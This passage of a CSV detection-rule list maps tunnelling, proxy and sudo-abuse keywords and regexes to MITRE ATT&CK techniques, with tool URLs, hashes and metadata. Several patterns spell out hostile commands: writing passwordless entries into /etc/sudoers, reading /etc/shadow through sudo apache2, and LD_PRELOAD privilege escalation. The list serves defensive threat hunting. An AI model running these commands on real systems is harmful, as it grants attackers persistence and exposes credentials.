TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*sshtunnel.readthedocs.io*",".{0,1000}sshtunnel\.readthedocs\.io.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*sshtunnel.readthedocs.org*",".{0,1000}sshtunnel\.readthedocs\.org.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "* install sshuttle*",".{0,1000}\sinstall\ssshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "* py39-sshuttle*",".{0,1000}\spy39\-sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "* sshuttle:sshuttle *",".{0,1000}\ssshuttle\:sshuttle\s.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. 
Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/etc/sshuttle*",".{0,1000}\/etc\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/home/sshuttle*",".{0,1000}\/home\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/sshuttle.git*",".{0,1000}\/sshuttle\.git.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/sshuttle.py*",".{0,1000}\/sshuttle\.py.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/sshuttle/tarball*",".{0,1000}\/sshuttle\/tarball.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. 
Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/sshuttle/zipball*",".{0,1000}\/sshuttle\/zipball.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*/tmp/sshuttle*",".{0,1000}\/tmp\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*b86e9468c1470e3a3e776f5cab91a1cb79927743cfbc92535e753024611e8b4e*",".{0,1000}b86e9468c1470e3a3e776f5cab91a1cb79927743cfbc92535e753024611e8b4e.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","#filehash","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*net-proxy/sshuttle*",".{0,1000}net\-proxy\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. 
Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle -*",".{0,1000}sshuttle\s\-.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.cmdline*",".{0,1000}sshuttle\.cmdline.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.firewall*",".{0,1000}sshuttle\.firewall.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.linux*",".{0,1000}sshuttle\.linux.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.methods.socket*",".{0,1000}sshuttle\.methods\.socket.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. 
Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.server*",".{0,1000}sshuttle\.server.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.service*",".{0,1000}sshuttle\.service.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle.ssh*",".{0,1000}sshuttle\.ssh.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sshuttle/sshuttle*",".{0,1000}sshuttle\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*SSHUTTLE0001*",".{0,1000}SSHUTTLE0001.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. 
Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*sudoers.d/sshuttle_auto*",".{0,1000}sudoers\.d\/sshuttle_auto.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "*systemctl start sshuttle*",".{0,1000}systemctl\sstart\ssshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z" "* --bin sshx-server*",".{0,1000}\s\-\-bin\ssshx\-server.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "* s3://sshx/*",".{0,1000}\ss3\:\/\/sshx\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*.vm.sshx.internal:8051*",".{0,1000}\.vm\.sshx\.internal\:8051.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - 
T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*/release/sshx-server*",".{0,1000}\/release\/sshx\-server.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*/sshx-server/*",".{0,1000}\/sshx\-server\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*\sshx-*.tar.gz*",".{0,1000}\\sshx\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*cargo install sshx*",".{0,1000}cargo\sinstall\ssshx.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*ekzhang/sshx*",".{0,1000}ekzhang\/sshx.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*https://s3.amazonaws.com/sshx/sshx-*",".{0,1000}https\:\/\/s3\.amazonaws\.com\/sshx\/sshx\-.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*https://sshx.io/get*",".{0,1000}https\:\/\/sshx\.io\/get.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*https://sshx.io/s/*",".{0,1000}https\:\/\/sshx\.io\/s\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*sshx-server --listen*",".{0,1000}sshx\-server\s\-\-listen.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*sshx-server-*.tar.gz*",".{0,1000}sshx\-server\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z" "*http*.sslip.io*",".{0,1000}http.{0,1000}\.sslip\.io.{0,1000}","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","N/A","legitimate tool abused by threat actors to bypass IP blocking and encrypt traffic","6","10","594","75","2024-08-30T00:09:57Z","2015-08-26T18:43:35Z" "*./staqlab-tunnel *",".{0,1000}\.\/staqlab\-tunnel\s.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*/bin/staqlab-tunnel*",".{0,1000}\/bin\/staqlab\-tunnel.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*6510fdf42becdab665232ef6393e40a559dd2b3b2b7927333c9f30a62bf7de3f*",".{0,1000}6510fdf42becdab665232ef6393e40a559dd2b3b2b7927333c9f30a62bf7de3f.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*7ec426ac53bac81654965fa1b8ff8af3451b7524f648d4b11ea7d3437a5ba907*",".{0,1000}7ec426ac53bac81654965fa1b8ff8af3451b7524f648d4b11ea7d3437a5ba907.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*d0d66c649a64735a67735370f0790418b48abeccaa0506fa66f00a967e8c3b73*",".{0,1000}d0d66c649a64735a67735370f0790418b48abeccaa0506fa66f00a967e8c3b73.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*staqlab-tunnel port=*",".{0,1000}staqlab\-tunnel\sport\=.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*staqlab-tunnel.exe*",".{0,1000}staqlab\-tunnel\.exe.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*staqlab-tunnel.zip*",".{0,1000}staqlab\-tunnel\.zip.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*tunnel.staqlab.com*",".{0,1000}tunnel\.staqlab\.com.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" 
"*tunnel-api.staqlab.com*",".{0,1000}tunnel\-api\.staqlab\.com.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z" "*/linux_x64_admin*",".{0,1000}\/linux_x64_admin.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z" "*/linux_x64_agent*",".{0,1000}\/linux_x64_agent.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z" "*/linux_x86_admin*",".{0,1000}\/linux_x86_admin.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z" "*/linux_x86_agent*",".{0,1000}\/linux_x86_agent.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z" "*.server_DoElevationRequest((Get-NtProcess -ProcessId $pid)*""cmd.exe""*C:\""*",".{0,1000}\.server_DoElevationRequest\(\(Get\-NtProcess\s\-ProcessId\s\$pid\).{0,1000}\""cmd\.exe\"".{0,1000}C\:\\\"".{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing 
privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*Connect-RpcClient * -EndpointPath sudo_elevate_4652*",".{0,1000}Connect\-RpcClient\s.{0,1000}\s\-EndpointPath\ssudo_elevate_4652.{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*",".{0,1000}echo\s.{0,1000}\%sudo\s\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*sudo apache2 -f /etc/shadow*",".{0,1000}sudo\sapache2\s\-f\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sudo LD_LIBRARY_PATH=. 
apache2*",".{0,1000}sudo\sLD_LIBRARY_PATH\=\.\sapache2.{0,1000}","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option to escalate privileges","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sudo LD_PRELOAD=/tmp/preload.so find*",".{0,1000}sudo\sLD_PRELOAD\=\/tmp\/preload\.so\sfind.{0,1000}","greyware_tool_keyword","sudo","abusing LD_PRELOAD option to escalate privileges","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=NOPASSWD\:\s\/bin\/bash.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/suo5.git*",".{0,1000}\/suo5\.git.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5/releases/*",".{0,1000}\/suo5\/releases\/.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*/suo5-darwin-amd64*",".{0,1000}\/suo5\-darwin\-amd64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-darwin-arm64*",".{0,1000}\/suo5\-darwin\-arm64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-gui-darwin.app.zip*",".{0,1000}\/suo5\-gui\-darwin\.app\.zip.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-gui-linux*",".{0,1000}\/suo5\-gui\-linux.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-gui-windows.exe*",".{0,1000}\/suo5\-gui\-windows\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*/suo5-linux-amd64*",".{0,1000}\/suo5\-linux\-amd64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
